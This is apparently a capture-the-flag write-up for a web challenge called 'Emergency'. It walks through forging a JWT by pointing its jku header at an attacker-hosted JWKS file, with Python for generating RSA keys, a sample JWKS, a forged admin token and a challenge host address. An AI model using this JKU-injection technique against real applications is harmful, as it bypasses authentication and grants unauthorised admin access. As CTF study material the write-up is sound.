# Web - Emergency Is running Sqlite3 Logging in gives JWT token. Decompile and see the JKU has value: http://localhost/.well-know/jwks.json Forging the JWT to point to a JKU I control causes a time-out. Not sure if the docker doesn't have ability to make the call or what's going on http://46.101.23.188:30842/.well-known/d3a73ee1-4400-4f7c-b47f-d685aeda67a1 And .key, .pem and other variants don't seem to exist Used https://mkjwk.org/ to forge the tokens and uploaded the stuff to my vanity domain Continuously getting invalid signature though. Not sure why https://jwt.davetonge.co.uk/#jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9kaXZpZGVieW51bGwuY29tL2p3a3MuanNvbiIsImtpZCI6IjI4MGM5NzZmLTY1MmMtNGRhZS1hYTg2LTMyNTU1ZTg5NzRiMiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjI3MTg5NjkzLCJleHAiOjE2MjcyMTEyOTN9.z8Nzs8GN25M51WCMRdCen4PB7ABRSAQWZnzkXa5YtYCt9TLhqxs49dId7iX-ZOuPRn-4m24d-79MIgrtmS9-wQ-_rJYLgoSbrgItYOnavbBa5T4IctRCi6yAYVbvZU2gj6vafWVUxkfA9HdPIvtXQSm-y8vY8fqQmbm6MR8R3VpZedf-I8h_4U5FsE5Ljlnwd5SPo1hMv6ew24XHrCFR1HXgJJFbwfiNygI7Mk0us5rRulg9fp37BGxfCmYDHEUKhaA1Dky8LVIBtIDNKsAeVXPUreV8K_p3zevFFxEX8wDTq5vMWFm8s5gtE3hjHvn_AM7FWu700q-H762Gg-4FPw&jwks=http://dividebynull.com/jwks.json Shows that this is valid, not clear why this is failing Ok, so fuck all of these stupid online tools. The lesson learned? Just do it yourself. Here's what I did: ``` from cryptography.hazmat.primitives.asymmetric import rsa pubExp = 65537 real_modulusLen = 2048 from cryptography.hazmat.backends import default_backend private_key = rsa.generate_private_key(public_exponent=pubExp, key_size=real_modulusLen,backend=default_backend()) pubKey = private_key.public_key() pubNum = pubKey.public_numbers() from cryptography.hazmat.primitives.serialization import Encoding from cryptography.hazmat.primitives.serialization import PrivateFormat from cryptography.hazmat.primitives.serialization import PublicFormat with open("privTest.pem", "wb") as f: f.write(private_key.private_bytes(Encoding.PEM, PrivateFormat.TraditionalOpenSSL, NoEncryption())) with open("pubTest.pem", "wb") as f: f.write(pubKey.public_bytes(encoding=Encoding.PEM, format=PublicFormat.SubjectPublicKeyInfo)) ``` This generates the public key and private key as well as the numbers for the JWK file Your JWK file will look like: ``` { "keys": [ { "kty": "RSA", "e": "65537", "use": "sig", "kid": "280c976f-652c-4dae-aa86-32555e8974b2", "alg": "RS256", "n": "27414166772039529759619928323428590518277251751336823991215524855980489037511379506428384859693727599170118890170603416987300948753528479137268603846478611671665115392522838672080364124108760464710433392407906975552850809421167306488211123310581757335802276808493747485606765361094947471261254578438200776864280933666281181145047813311006852153887144689611329033911782744268790296622013976660079034398524737148408148595399408170965302722263947314597922830640022909110669010142206484062380784541487259734035591673251868405891909486682984587798037564947330858968733063706388056893976569423632280838571981471962502574897" } ] } ``` Where e and k come from: ``` pubNum.n pubNum.e ``` Now go to https://jwt.io Grab the original JWT. Modifiy it to be admin, change the jku value to point to your hosted file, and change the kid as appropriate. Add the public/private keys into the approriate areas to generate the JWT Now set the cookie to the new JWT and refresh the page. You'll be admin